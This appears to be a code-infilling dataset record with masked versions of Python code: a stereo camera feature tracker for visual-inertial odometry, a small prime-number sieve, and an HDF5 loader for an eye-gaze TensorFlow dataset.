image.\r\n \"\"\"\r\n curr_img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(curr_img)\r\n\r\n # Create a mask to avoid redetecting existing features.\r\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\r\n\r\n for feature in chain.from_iterable(self.curr_features):\r\n x, y = map(int, feature.cam0_point)\r\n mask[y-3:y+4, x-3:x+4] = 0\r\n\r\n # Detect new features.\r\n new_features = 
self.detector.detect(curr_img, mask=mask)\r\n\r\n # Collect the new detected features based on the grid.\r\n # Select the ones with top response within each grid afterwards.\r\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\r\n for feature in new_features:\r\n row = int(feature.pt[1] / grid_height)\r\n col = int(feature.pt[0] / grid_width)\r\n code = row * self.config.grid_col + col\r\n new_feature_sieve[code].append(feature)\r\n\r\n new_features = []\r\n for features in new_feature_sieve:\r\n if len(features) > self.config.grid_max_feature_num:\r\n features = sorted(features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_max_feature_num]\r\n new_features.append(features)\r\n new_features = list(chain.from_iterable(new_features))\r\n\r\n # Find the stereo matched points for the newly detected features.\r\n cam0_points = [kp.pt for kp in new_features]\r\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\r\n\r\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\r\n for i, inlier in enumerate(inlier_markers):\r\n if not inlier:\r\n continue\r\n cam0_inliers.append(cam0_points[i])\r\n cam1_inliers.append(cam1_points[i])\r\n response_inliers.append(new_features[i].response)\r\n # if len(cam0_inliers) < max(5, len(new_features) * 0.1):\r\n\r\n # Group the features into grids\r\n grid_new_features = [[] for _ in range(self.config.grid_num)]\r\n for i in range(len(cam0_inliers)):\r\n cam0_point = cam0_inliers[i]\r\n cam1_point = cam1_inliers[i]\r\n response = response_inliers[i]\r\n\r\n row = int(cam0_point[1] / grid_height)\r\n col = int(cam0_point[0] / grid_width)\r\n code = row*self.config.grid_col + col\r\n\r\n new_feature = FeatureMetaData()\r\n new_feature.response = response\r\n new_feature.cam0_point = cam0_point\r\n new_feature.cam1_point = cam1_point\r\n grid_new_features[code].append(new_feature)\r\n\r\n # Sort the new features in each grid based on its response.\r\n # And collect new features within each grid with high response.\r\n for i, new_features in enumerate(grid_new_features):\r\n for feature in sorted(new_features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_min_feature_num]:\r\n self.curr_features[i].append(feature)\r\n self.curr_features[i][-1].id = self.next_feature_id\r\n self.curr_features[i][-1].lifetime = 1\r\n self.next_feature_id += 1\r\n\r\n def prune_features(self):\r\n \"\"\"\r\n Remove some of the features of a grid in case there are too many \r\n features inside of that grid, which ensures the number of features \r\n within each grid is bounded.\r\n \"\"\"\r\n for i, features in enumerate(self.curr_features):\r\n # Continue if the number of features in this grid does\r\n # not exceed the upper bound.\r\n if len(features) <= self.config.grid_max_feature_num:\r\n continue\r\n self.curr_features[i] = sorted(features, key=lambda x:x.lifetime, \r\n reverse=True)[:self.config.grid_max_feature_num]\r\n\r\n def load_features(self):\r\n\r\n # load features \r\n filename = self.config.result_dir + str(self.image_id) + \".npz\"\r\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\r\n self.image_id += 1 \r\n\r\n def save_features(self):\r\n \r\n # save features \r\n filename = self.config.result_dir + str(self.image_id) + \".npz\"\r\n np.savez(filename, self.curr_features)\r\n self.image_id += 1 \r\n\r\n def publish(self):\r\n \"\"\"\r\n Publish the features on the current image including both the \r\n tracked and newly detected ones.\r\n \"\"\"\r\n\r\n curr_ids = []\r\n curr_cam0_points 
= []\r\n curr_cam1_points = []\r\n for feature in chain.from_iterable(self.curr_features):\r\n curr_ids.append(feature.id)\r\n curr_cam0_points.append(feature.cam0_point)\r\n curr_cam1_points.append(feature.cam1_point)\r\n\r\n curr_cam0_points_undistorted = self.undistort_points(\r\n curr_cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs)\r\n curr_cam1_points_undistorted = self.undistort_points(\r\n curr_cam1_points, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n\r\n features = []\r\n for i in range(len(curr_ids)):\r\n fm = FeatureMeasurement()\r\n fm.id = curr_ids[i]\r\n fm.u0 = curr_cam0_points_undistorted[i][0]\r\n fm.v0 = curr_cam0_points_undistorted[i][1]\r\n fm.u1 = curr_cam1_points_undistorted[i][0]\r\n fm.v1 = curr_cam1_points_undistorted[i][1]\r\n features.append(fm)\r\n\r\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(\r\n self.cam0_curr_img_msg.timestamp, features)\r\n return feature_msg\r\n\r\n def integrate_imu_data(self):\r\n \"\"\"\r\n Integrates the IMU gyro readings between the two consecutive images, \r\n which is used for both tracking prediction and 2-point RANSAC.\r\n\r\n Returns:\r\n cam0_R_p_c: a rotation matrix which takes a vector from previous \r\n cam0 frame to current cam0 frame.\r\n cam1_R_p_c: a rotation matrix which takes a vector from previous \r\n cam1 frame to current cam1 frame.\r\n \"\"\"\r\n # Find the start and the end limit within the imu msg buffer.\r\n idx_begin = None\r\n for i, msg in enumerate(self.imu_msg_buffer):\r\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\r\n idx_begin = i\r\n break\r\n\r\n idx_end = None\r\n for i, msg in enumerate(self.imu_msg_buffer):\r\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\r\n idx_end = i\r\n break\r\n\r\n if idx_begin is None or idx_end is None:\r\n return np.identity(3), np.identity(3)\r\n\r\n # Compute the mean angular velocity in the IMU frame.\r\n mean_ang_vel = np.zeros(3)\r\n for i in range(idx_begin, idx_end):\r\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\r\n\r\n if idx_end > idx_begin:\r\n mean_ang_vel /= (idx_end - idx_begin)\r\n\r\n # Transform the mean angular velocity from the IMU frame to the \r\n # cam0 and cam1 frames.\r\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\r\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\r\n\r\n # Compute the relative rotation.\r\n dt = self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.timestamp\r\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\r\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\r\n\r\n # Delete the useless and used imu messages.\r\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\r\n return cam0_R_p_c, cam1_R_p_c\r\n\r\n def rescale_points(self, pts1, pts2):\r\n \"\"\"\r\n Arguments:\r\n pts1: first set of points.\r\n pts2: second set of points.\r\n\r\n Returns:\r\n pts1: scaled first set of points.\r\n pts2: scaled second set of points.\r\n scaling_factor: scaling factor\r\n \"\"\"\r\n scaling_factor = 0\r\n for pt1, pt2 in zip(pts1, pts2):\r\n scaling_factor += np.linalg.norm(pt1)\r\n scaling_factor += np.linalg.norm(pt2)\r\n\r\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\r\n\r\n for i in range(len(pts1)):\r\n pts1[i] *= scaling_factor\r\n pts2[i] *= scaling_factor\r\n\r\n return pts1, pts2, scaling_factor\r\n\r\n # def two_point_ransac(self, pts1, pts2, R_p_c, intrinsics, \r\n # distortion_model, distortion_coeffs,\r\n # 
inlier_error, success_probability):\r\n # \"\"\"\r\n # Applies two point ransac algorithm to mark the inliers in the input set.\r\n\r\n # Arguments:\r\n # pts1: first set of points.\r\n # pts2: second set of points.\r\n # R_p_c: a rotation matrix takes a vector in the previous camera frame \r\n # to the current camera frame.\r\n # intrinsics: intrinsics of the camera.\r\n # distortion_model: distortion model of the camera.\r\n # distortion_coeffs: distortion coefficients.\r\n # inlier_error: acceptable error to be considered as an inlier.\r\n # success_probability: the required probability of success.\r\n\r\n # Returns:\r\n # inlier_flag: 1 for inliers and 0 for outliers.\r\n # \"\"\"\r\n # # Check the size of input point size.\r\n # assert len(pts1) == len(pts2), 'Sets of different size are used...'\r\n\r\n # norm_pixel_unit = 2.0 / (intrinsics[0] + intrinsics[1])\r\n # iter_num = int(np.ceil(np.log(1-success_probability) / np.log(1-0.7*0.7)))\r\n\r\n # # Initially, mark all points as inliers.\r\n # inlier_markers = [1] * len(pts1)\r\n\r\n # # Undistort all the points.\r\n # pts1_undistorted = self.undistort_points(pts1, intrinsics, \r\n # distortion_model, distortion_coeffs)\r\n # pts2_undistorted = self.undistort_points(pts2, intrinsics, \r\n # distortion_model, distortion_coeffs)\r\n\r\n # # Compenstate the points in the previous image with\r\n # # the relative rotation.\r\n # for i, pt in enumerate(pts1_undistorted):\r\n # pt_h = np.array([*pt, 1.0])\r\n # pt_hc = R_p_c @ pt_h\r\n # pts1_undistorted[i] = pt_hc[:2]\r\n\r\n # # Normalize the points to gain numerical stability.\r\n # pts1_undistorted, pts2_undistorted, scaling_factor = self.rescale_points(\r\n # pts1_undistorted, pts2_undistorted)\r\n\r\n # # Compute the difference between previous and current points,\r\n # # which will be used frequently later.\r\n # pts_diff = []\r\n # for pt1, pt2 in zip(pts1_undistorted, pts2_undistorted):\r\n # pts_diff.append(pt1 - pt2)\r\n\r\n # # Mark the point pairs with large difference directly.\r\n # # BTW, the mean distance of the rest of the point pairs are computed.\r\n # mean_pt_distance = 0.0\r\n # raw_inlier_count = 0\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # distance = np.linalg.norm(pt_diff)\r\n # # 25 pixel distance is a pretty large tolerance for normal motion.\r\n # # However, to be used with aggressive motion, this tolerance should\r\n # # be increased significantly to match the usage.\r\n # if distance > 50.0 * norm_pixel_unit:\r\n # inlier_markers[i] = 0\r\n # else:\r\n # mean_pt_distance += distance\r\n # raw_inlier_count += 1\r\n\r\n # mean_pt_distance /= raw_inlier_count\r\n\r\n # # If the current number of inliers is less than 3, just mark\r\n # # all input as outliers. This case can happen with fast\r\n # # rotation where very few features are tracked.\r\n # if raw_inlier_count < 3:\r\n # return [0] * len(inlier_markers)\r\n\r\n # # Before doing 2-point RANSAC, we have to check if the motion\r\n # # is degenerated, meaning that there is no translation between\r\n # # the frames, in which case, the model of the RANSAC does not work. 
\r\n # # If so, the distance between the matched points will be almost 0.\r\n # if mean_pt_distance < norm_pixel_unit:\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # if inlier_markers[i] == 0:\r\n # continue\r\n # if np.linalg.norm(pt_diff) > inlier_error * norm_pixel_unit:\r\n # inlier_markers[i] = 0\r\n # return inlier_markers\r\n\r\n # # In the case of general motion, the RANSAC model can be applied.\r\n # # The three column corresponds to tx, ty, and tz respectively.\r\n # coeff_t = []\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # coeff_t.append(np.array([\r\n # pt_diff[1],\r\n # -pt_diff[0],\r\n # pts1_undistorted[0] * pts2_undistorted[1] - \r\n # pts1_undistorted[1] * pts2_undistorted[0]]))\r\n # coeff_t = np.array(coeff_t)\r\n\r\n # raw_inlier_idx = np.where(inlier_markers)[0]\r\n # best_inlier_set = []\r\n # best_error = 1e10\r\n\r\n # for i in range(iter_num):\r\n # # Randomly select two point pairs.\r\n # # Although this is a weird way of selecting two pairs, but it\r\n # # is able to efficiently avoid selecting repetitive pairs.\r\n # pair_idx1 = np.random.choice(raw_inlier_idx)\r\n # idx_diff = np.random.randint(1, len(raw_inlier_idx))\r\n # pair_idx2 = (pair_idx1+idx_diff) % len(raw_inlier_idx)\r\n\r\n # # Construct the model.\r\n # coeff_t_ = np.array([coeff_t[pair_idx1], coeff_t[pair_idx2]])\r\n # coeff_tx = coeff_t_[:, 0]\r\n # coeff_ty = coeff_t_[:, 1]\r\n # coeff_tz = coeff_t_[:, 2]\r\n # coeff_l1_norm = np.linalg.norm(coeff_t_, 1, axis=0)\r\n # base_indicator = np.argmin(coeff_l1_norm)\r\n\r\n # if base_indicator == 0:\r\n # A = np.array([coeff_ty, coeff_tz]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_tx)\r\n # model = [1.0, *solution]\r\n # elif base_indicator == 1:\r\n # A = np.array([coeff_tx, coeff_tz]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_ty)\r\n # model = [solution[0], 1.0, solution[1]]\r\n # else:\r\n # A = np.array([coeff_tx, coeff_ty]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_tz)\r\n # model = [*solution, 1.0]\r\n\r\n # # Find all the inliers among point pairs.\r\n # error = coeff_t @ model\r\n\r\n # inlier_set = []\r\n # for i, e in enumerate(error):\r\n # if inlier_markers[i] == 0:\r\n # continue\r\n # if np.abs(e) < inlier_error * norm_pixel_unit:\r\n # inlier_set.append(i)\r\n\r\n # # If the number of inliers is small, the current model is \r\n # # probably wrong.\r\n # if len(inlier_set) < 0.2 * len(pts1_undistorted):\r\n # continue\r\n\r\n # # Refit the model using all of the possible inliers.\r\n # coeff_t_ = coeff_t[inlier_set]\r\n # coeff_tx_better = coeff_t_[:, 0]\r\n # coeff_ty_better = coeff_t_[:, 1]\r\n # coeff_tz_better = coeff_t_[:, 2]\r\n\r\n # if base_indicator == 0:\r\n # A = np.array([coeff_ty_better, coeff_tz_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tx_better)\r\n # model_better = [1.0, *solution]\r\n # elif base_indicator == 1:\r\n # A = np.array([coeff_tx_better, coeff_tz_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_ty_better)\r\n # model_better = [solution[0], 1.0, solution[1]]\r\n # else:\r\n # A = np.array([coeff_tx_better, coeff_ty_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tz_better)\r\n # model_better = [*solution, 1.0]\r\n\r\n # # Compute the error and upate the best model if possible.\r\n # new_error = coeff_t @ model_better\r\n # this_error = np.mean([np.abs(new_error[i]) for i in inlier_set])\r\n\r\n # if len(inlier_set) > best_inlier_set:\r\n # best_error = this_error\r\n # best_inlier_set = inlier_set\r\n\r\n # # Fill in the 
markers.\r\n # inlier_markers = [0] * len(pts1)\r\n # for i in best_inlier_set:\r\n # inlier_markers[i] = 1\r\n\r\n # return inlier_markers\r\n\r\n def get_grid_size(self, img):\r\n \"\"\"\r\n # Size of each grid.\r\n \"\"\"\r\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\r\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\r\n return grid_height, grid_width\r\n\r\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\r\n \"\"\"\r\n predictFeatureTracking Compensates the rotation between consecutive \r\n camera frames so that feature tracking would be more robust and fast.\r\n\r\n Arguments:\r\n input_pts: features in the previous image to be tracked.\r\n R_p_c: a rotation matrix takes a vector in the previous camera \r\n frame to the current camera frame. (matrix33)\r\n intrinsics: intrinsic matrix of the camera. (vec3)\r\n\r\n Returns:\r\n compensated_pts: predicted locations of the features in the \r\n current image based on the provided rotation.\r\n \"\"\"\r\n # Return directly if there are no input features.\r\n if len(input_pts) == 0:\r\n return []\r\n\r\n # Intrinsic matrix.\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n H = K @ R_p_c @ np.linalg.inv(K)\r\n\r\n compensated_pts = []\r\n for i in range(len(input_pts)):\r\n p1 = np.array([*input_pts[i], 1.0])\r\n p2 = H @ p1\r\n compensated_pts.append(p2[:2] / p2[2])\r\n return np.array(compensated_pts, dtype=np.float32)\r\n\r\n def stereo_match(self, cam0_points):\r\n \"\"\"\r\n Matches features with stereo image pairs.\r\n\r\n Arguments:\r\n cam0_points: points in the primary image.\r\n\r\n Returns:\r\n cam1_points: points in the secondary image.\r\n inlier_markers: 1 if the match is valid, 0 otherwise.\r\n \"\"\"\r\n cam0_points = np.array(cam0_points)\r\n if len(cam0_points) == 0:\r\n return []\r\n\r\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\r\n cam0_points_undistorted = self.undistort_points(\r\n cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs, R_cam0_cam1)\r\n cam1_points = self.distort_points(\r\n cam0_points_undistorted, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n cam1_points_copy = cam1_points.copy()\r\n\r\n # Track features using LK optical flow method.\r\n cam0_points = cam0_points.astype(np.float32)\r\n cam1_points = cam1_points.astype(np.float32)\r\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(\r\n self.curr_cam0_pyramid, self.curr_cam1_pyramid,\r\n cam0_points, cam1_points, **self.config.lk_params)\r\n\r\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(\r\n self.curr_cam1_pyramid, self.curr_cam0_pyramid, \r\n cam1_points, cam0_points.copy(), **self.config.lk_params)\r\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\r\n\r\n # cam1_points_undistorted = self.undistort_points(\r\n # cam1_points, self.cam1_intrinsics,\r\n # self.cam1_distortion_model, self.cam1_distortion_coeffs, R_cam0_cam1)\r\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\r\n \r\n\r\n \r\n inlier_markers = np.logical_and.reduce(\r\n [inlier_markers.reshape(-1), err < 3, disparity < 20])\r\n\r\n # Mark those tracked points out of the image region as untracked.\r\n img = self.cam1_curr_img_msg.image\r\n for i, point in enumerate(cam1_points):\r\n if not inlier_markers[i]:\r\n continue\r\n if (point[0] < 0 or point[0] > img.shape[1]-1 or \r\n point[1] < 0 or point[1] > img.shape[0]-1):\r\n 
inlier_markers[i] = 0\r\n\r\n # Compute the relative rotation between the cam0 frame and cam1 frame.\r\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\r\n # Compute the essential matrix.\r\n E = skew(t_cam0_cam1) @ R_cam0_cam1\r\n\r\n # Further remove outliers based on the known essential matrix.\r\n cam0_points_undistorted = self.undistort_points(\r\n cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs)\r\n cam1_points_undistorted = self.undistort_points(\r\n cam1_points, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n\r\n norm_pixel_unit = 4.0 / (\r\n self.cam0_intrinsics[0] + self.cam0_intrinsics[1] +\r\n self.cam1_intrinsics[0] + self.cam1_intrinsics[1])\r\n\r\n for i in range(len(cam0_points_undistorted)):\r\n if not inlier_markers[i]:\r\n continue\r\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\r\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\r\n epipolar_line = E @ pt0\r\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\r\n epipolar_line[:2])\r\n\r\n if error > self.config.stereo_threshold * norm_pixel_unit:\r\n inlier_markers[i] = 0\r\n\r\n return cam1_points, inlier_markers\r\n\r\n def undistort_points(self, pts_in, intrinsics, distortion_model, \r\n distortion_coeffs, rectification_matrix=np.identity(3),\r\n new_intrinsics=np.array([1, 1, 0, 0])):\r\n \"\"\"\r\n Arguments:\r\n pts_in: points to be undistorted.\r\n intrinsics: intrinsics of the camera.\r\n distortion_model: distortion model of the camera.\r\n distortion_coeffs: distortion coefficients.\r\n rectification_matrix:\r\n new_intrinsics:\r\n\r\n Returns:\r\n pts_out: undistorted points.\r\n \"\"\"\r\n if len(pts_in) == 0:\r\n return []\r\n \r\n pts_in = np.reshape(pts_in, (-1, 1, 2))\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n K_new = np.array([\r\n [new_intrinsics[0], 0.0, new_intrinsics[2]],\r\n [0.0, new_intrinsics[1], new_intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n\r\n if distortion_model == 'equidistant':\r\n pts_out = cv2.fisheye.undistortPoints(pts_in, K, distortion_coeffs,\r\n rectification_matrix, K_new)\r\n else: # default: 'radtan'\r\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs, None,\r\n rectification_matrix, K_new)\r\n return pts_out.reshape((-1, 2))\r\n\r\n def distort_points(self, pts_in, intrinsics, distortion_model, \r\n distortion_coeffs):\r\n \"\"\"\r\n Arguments:\r\n pts_in: points to be distorted.\r\n intrinsics: intrinsics of the camera.\r\n distortion_model: distortion model of the camera.\r\n distortion_coeffs: distortion coefficients.\r\n\r\n Returns:\r\n pts_out: distorted points. 
(N, 2)\r\n \"\"\"\r\n if len(pts_in) == 0:\r\n return []\r\n\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n\r\n if distortion_model == 'equidistant':\r\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\r\n else: # default: 'radtan'\r\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\r\n pts_out, _ = cv2.projectPoints(homogenous_pts, \r\n np.zeros(3), np.zeros(3), K, distortion_coeffs)\r\n return pts_out.reshape((-1, 2))\r\n\r\n def draw_features_stereo(self):\r\n img0 = self.cam0_curr_img_msg.image\r\n img1 = self.cam1_curr_img_msg.image\r\n\r\n kps0 = []\r\n kps1 = []\r\n matches = []\r\n for feature in chain.from_iterable(self.curr_features):\r\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\r\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\r\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\r\n\r\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\r\n cv2.imshow('stereo features', img)\r\n cv2.waitKey(1)\r\n\r\n\r\ndef skew(vec):\r\n x, y, z = vec\r\n return np.array([\r\n [0, -z, y],\r\n [z, 0, -x],\r\n [-y, x, 0]])\r\n\r\ndef select(data, selectors):\r\n return [d for d, s in zip(data, selectors) if s]\r\n\r\n\r\n",
"step-ids": [
18,
20,
23,
25,
31
]
}
|
[
18,
20,
23,
25,
31
] |
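The stereo_match step in the record above prunes matches with the epipolar
constraint from the known cam0->cam1 extrinsics. Below is a minimal,
self-contained numpy sketch of that check; the rotation, baseline, point
pairs, and threshold are made-up placeholders, and the residual is the
standard point-to-epipolar-line distance.

import numpy as np

def skew(v):
    # Cross-product matrix of a 3-vector.
    x, y, z = v
    return np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])

def epipolar_inliers(pts0, pts1, R, t, threshold):
    # pts0, pts1: (N, 2) undistorted, normalized points in cam0 / cam1.
    # R, t: rotation and translation taking cam0 coordinates into cam1.
    E = skew(t) @ R                                  # essential matrix
    p0 = np.hstack([pts0, np.ones((len(pts0), 1))])  # homogeneous points
    p1 = np.hstack([pts1, np.ones((len(pts1), 1))])
    lines = (E @ p0.T).T                             # epipolar line of each pt0 in image 1
    # Distance of pt1 from its epipolar line: |l . p1| / ||(l_x, l_y)||
    num = np.abs(np.sum(p1 * lines, axis=1))
    den = np.linalg.norm(lines[:, :2], axis=1)
    return num / den < threshold

# Toy usage: identity rotation, pure horizontal baseline.
R = np.eye(3)
t = np.array([0.1, 0.0, 0.0])
pts0 = np.array([[0.0, 0.0], [0.2, -0.1]])
pts1 = np.array([[0.05, 0.0], [0.25, 0.3]])  # second pair violates the constraint
print(epipolar_inliers(pts0, pts1, R, t, threshold=0.01))  # [ True False]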
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(2, N + 1):
prime -= set(range(i ** 2, N + 1, i))
for number in prime:
print(number)
<|reserved_special_token_1|>
M, N = 3, 16
prime = set(range(M, N + 1))
for i in range(2, N + 1):
prime -= set(range(i ** 2, N + 1, i))
for number in prime:
print(number)
|
flexible
|
{
"blob_id": "d190eb27ea146cf99ac7f8d29fb5f769121af60e",
"index": 9437,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(2, N + 1):\n prime -= set(range(i ** 2, N + 1, i))\nfor number in prime:\n print(number)\n",
"step-3": "M, N = 3, 16\nprime = set(range(M, N + 1))\nfor i in range(2, N + 1):\n prime -= set(range(i ** 2, N + 1, i))\nfor number in prime:\n print(number)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
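The record above collects the primes in [M, N] by subtracting multiples from a
candidate set. A small generalization of the same idea (primes_between is a
name introduced here, not part of the record): the strike-out loop only has to
run up to sqrt(n), because any composite <= n has a prime factor <= sqrt(n).

def primes_between(m, n):
    # Primes in [m, n] via set differences, as in the snippet above.
    candidates = set(range(max(m, 2), n + 1))
    for i in range(2, int(n ** 0.5) + 1):
        candidates -= set(range(i * i, n + 1, i))
    return sorted(candidates)

print(primes_between(3, 16))  # [3, 5, 7, 11, 13]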
<|reserved_special_token_0|>
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeneratorVGGNet:
<|reserved_special_token_0|>
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeneratorVGGNet:
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(
key) + '/head'], hf[str(key) + '/gaze']):
yield f, g, z
else:
for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +
'/head']):
yield f, g
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
